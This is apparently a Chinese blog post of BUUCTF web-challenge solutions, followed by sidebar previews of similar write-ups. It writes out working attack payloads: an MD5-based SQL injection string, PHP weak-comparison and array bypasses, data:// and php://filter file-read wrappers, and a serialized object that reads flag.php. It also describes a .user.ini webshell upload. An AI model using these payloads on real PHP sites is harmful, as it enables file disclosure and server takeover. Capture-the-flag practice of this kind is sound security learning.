BUUctf刷题第三天

最新推荐文章于 2022-09-13 16:06:41 发布
最新推荐文章于 2022-09-13 16:06:41 发布
阅读量176 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jie_a/article/details/118034996
版权

[极客大挑战 2019]BuyFlag

进去是一个网页,查看源代码
在这里插入图片描述
说只有啥玩意的学生才能买,就抓包看看
在这里插入图片描述
发现cookie后面有个user=0,改成一试试
改完后说我是啥啥啥的学生了可以支付购买了
结合前面给的验证
payload:?password=404a&money=100000000
在这里插入图片描述
他还嫌钱的数字长,离谱,换成科学计数法

在这里插入图片描述
感觉这道题非常有意思

[BJDCTF2020]Easy MD5

题目给了个github链接
点进去能看到源码,我们先看index.php
在这里插入图片描述

是个md5加密后的注入,这让我想起我在ctfshow做过
输入ffifdyop,即可
他的md5恰好是’or’6�]��!r,��b
可以拼接成select * from admin where password=’‘or’6<乱码>’
之后变成了另一个网页
在这里插入图片描述

源代码显示还是个md5绕过,
payload:?a=sonZ7y&b=byGcY
利用php弱比较
在这里插入图片描述
变成了这样,好家伙这波是全等于
利用md5不能处理数组绕过null=null
payload:param1[]=1&param2[]=2

[ZJCTF 2019]NiZhuanSiWei

在这里插入图片描述
用php伪协议绕过
data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
在利用协议读取useless.php
file=php://filter/read=convert.base64-encode/resource=useless.php
读取的源码

<?php  
class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

这是个简单的反序列化,让file等于flag.php就行
O:4:“Flag”:1:{s:4:“file”;s:8:“flag.php”;}
然后三者结合
终极payload:

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

flag就出来了

[SUCTF 2019]CheckIn

打开是个文件上传,上传显示非法后缀,应该是个黑名单
上传.user.ini,写图片头。
/a228d6b3b0d235dc04adf5f378363159
然后不让我写<?
然后换一种写法写一句话
在这里插入图片描述
然后提交,用一句话连接
在这里插入图片描述
今天的任务完成了,溜溜球

盖世大宝剑a
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF-Web-[极客大挑战 2019]BuyFlag
归子莫的博客
05-03 1590
CTF-Web-[极客大挑战 2019]BuyFlag 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客大挑战 2019]BuyFlag 打开题目的实例 思路 看到这个题目,应该是ph...
Buuctf [极客大挑战 2019]BuyFlag1 WP解析
qq_60115503的博客
11-07 1206
源代码要求我们必须是cuit的学生才可以登录,发现cookie:user=0怀疑是身份判断的位置,布尔值0是false 1为true,修改数据包发送发现要求我们这里输入密码。提示我,1Nember lenth is too long数字太长了,我们这里使用科学计数法将100000000改成10e9。用post方法发送一个名为password的变量,设置password=404a任何字母都可以。我们通过burpsuite将get包修改为post包。点击change body encoding。
CTF刷题网站汇总(包括本地可以自己搭建的)(1)
qq_51550750的博客
01-29 1万+
CTF刷题网站汇总(包括本地可以自己搭建的) CTF刷题平台汇总(欢迎各位师傅们补充) 第一个当然是CTFshow啦!https://ctf.show/ 攻防世界 https://adworld.xctf.org.cn/ Bugku https://ctf.bugku.com/ 论剑场 https://new.bugku.com/ Buuctf https://buuoj.cn/ Jarvisoj https://www.jarvisoj.com/ 墨者学院 https://www.mozhe.cn/ 看雪
CTF中Web题目的各种基础的思路-----入门篇十分的详细
m0_64815693的博客
09-13 2万+
想学习CTF-web这里给你一个思路,给你一个方向
第二十四题——[ZJCTF 2019]NiZhuanSiWei
分享简单的安全技术
04-15 415
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,展示了php代码 第二步:使用data协议绕过text参数检测 经过代码分析,text参数不能为空,且根据text参数所指定的文件名字读取出来与字符串welcome to the zjctf进行比较。 使用data协议进行绕过文件读取,将welcome to the zjctf进行64编码后得到:d2VsY29tZSB0byB0aGUgempjdGY=,传入参数text=data://text/plain;ba
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
3. **安全使用parse_str()**:对传入`parse_str()`的字符串进行严格控制,避免包含不受信任的数据。 4. **避免import_request_variables()**:由于其固有的风险,尽可能避免使用此函数。 5. **使用预定义变量**:...
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
BUUCTF部分web题目
最新发布
05-06
### BUUCTF部分Web题目分析 #### WMCTF2020 Make PHP Great Again **题目背景**: 这道题目主要是考察PHP中的`require_once()`函数的使用以及如何利用符号链接来读取文件。 **核心知识点**: 1. **`require_once()...
[ZJCTF 2019]NiZhuanSiWei
weixin_43152809的博客
10-03 1674
[ZJCTF 2019]NiZhuanSiWei 打开主界面就是这个亚子 传入一个文件文件内容为 welcome to the zjctf 可以使用php伪协议或者data伪协议 ?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY= 绕过了第一层 随后,下面包含了一个文件,利用php伪协议查看一下useless.php的内容 file=php://filter/read=convert.base64-encode/resource=use
浙江省大学生网络与信息安全竞赛-决赛-2019-Web-逆转思维(php几个协议的运用)
weixin_45844670的博客
09-23 1416
<?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"
BUUCTF_web部分题解
ro4lsc的博客
04-14 1万+
[极客大挑战 2019]Havefun [CISCN2019 华北赛区 Day2 Web1]Hack World [极客大挑战 2019]Secret File [极客大挑战 2019]Knife [极客大挑战 2019]LoveSQL [极客大挑战 2019]Http [GXYCTF2019]Ping Ping Ping [极客大挑战 2019]BabySQL [极客大挑战 2019]BuyFlag [ZJCTF 2019]NiZhuanSiWei [ACTF2020 新生赛]Include
BUUCTF-Web题解(一)
flying_bird2019的博客
12-20 1492
ping ping ping 参考其他wp: 链接 执行系统命令 先输入:?ip=127.0.0.1;ls 输出: flag.php index.php ?ip=127.0.0.1;cat flag.php fxck your space! 过滤了空格 空格可以用 ${IFS} $IFS$1 //$加其他数字都可以 < <> {cat,flag.php} %09 代替 ?ip=127.0.0.1;cat,flag.php fxck your flag! flag被过滤 读一下index.p
CTF.show 文件包含
m0_64444909的博客
08-25 1870
ctf文件包含
一天一道ctf 第16天(data伪协议,异或sql注入)
scrawman的博客
03-29 2038
看到unserialize()函数觉得是反序列化的题,但是没有看到class的定义。作者这边提示了useless.php,那就用filter伪协议读一下看看。?file=php://filter/read=convert.base64-encode/resource=useless.php,没有反应,忘记了前面text也要绕过。 text的值可以用data伪协议输入,?text=data:text/plain,welcome to the zjctf&file=php://filter/read=.
网络安全实验室CTF练习部分题目(持续更新)
热门推荐
技术学习人生
06-29 8万+
1、脚本关:微笑一下,过关地址:http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php 查看源代码: include('flag.php'); $smile = 1; if (!isset ($_GET['^_^'])) $smile = 0; if (preg_match
BUUCTF刷题记录
qq_43579362的博客
09-13 806
1.NiZhuangSiWei 知识点: php://input,php://filter,文件包含,序列化 赛题代码: <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><
【学习笔记10】buu [ZJCTF 2019]NiZhuanSiWei
weixin_43553654的博客
05-06 431
打开一看 <?php $text=$_GET["text"]; $file=$_GET["file"]; $password=$_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcometothezjctf")){ echo"<br><...
buuctf web
08-15
- *2* [【BUUCTF刷题】Web解题方法总结(一)](https://blog.csdn.net/qq_45834505/article/details/114276572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值